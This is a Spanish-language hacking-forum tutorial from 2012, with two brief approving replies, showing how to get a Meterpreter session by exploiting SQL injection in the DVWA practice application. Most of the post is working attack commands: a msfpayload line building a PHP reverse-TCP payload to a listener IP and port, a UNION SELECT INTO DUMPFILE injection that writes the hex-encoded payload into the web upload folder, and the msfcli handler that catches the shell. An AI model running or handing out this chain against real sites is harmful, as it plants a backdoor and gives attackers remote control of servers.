Obtener una sesion meterpreter explotando SQL Injection

Pr0ph3t · Mayo 02, 2012, 11:07:49 AM

Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA.

1. Creamos el payload:

Código: text

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php

2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

3. El codigo quedaría algo así:

Código: text

233c3f7068700a0a6572726f725f7265706f7274696e672830...

4. Inyectamos el siguiente comando en la aplicación web:

Código: text

' union select '',0x233c3f7068700a0a6572726f725f7265706f7274696e672830... into dumpfile '/opt/lampp/htdocs/uploads/payload.php'#

5. Nos quedamos escuchando para cuando se ejecuta el payload.

Código: text

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 E

5. Ahora si nos vamos al sitio el cual hemos subido el payload (/opt/lampp/htdocs/uploads/) y lo ejecutamos tendríamos que obtener la sesión Meterpreter.

6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.

FUENTE: Segu-Info

andrewtwo · Agosto 30, 2012, 04:59:52 AM

Me gusto por la combinación con metasploit

Muppet · Agosto 30, 2012, 01:26:24 PM

Buen Aporte!

Obtener una sesion meterpreter explotando SQL Injection

Pr0ph3t

Mayo 02, 2012, 11:07:49 AM

andrewtwo

Agosto 30, 2012, 04:59:52 AM #1

Muppet

Agosto 30, 2012, 01:26:24 PM #2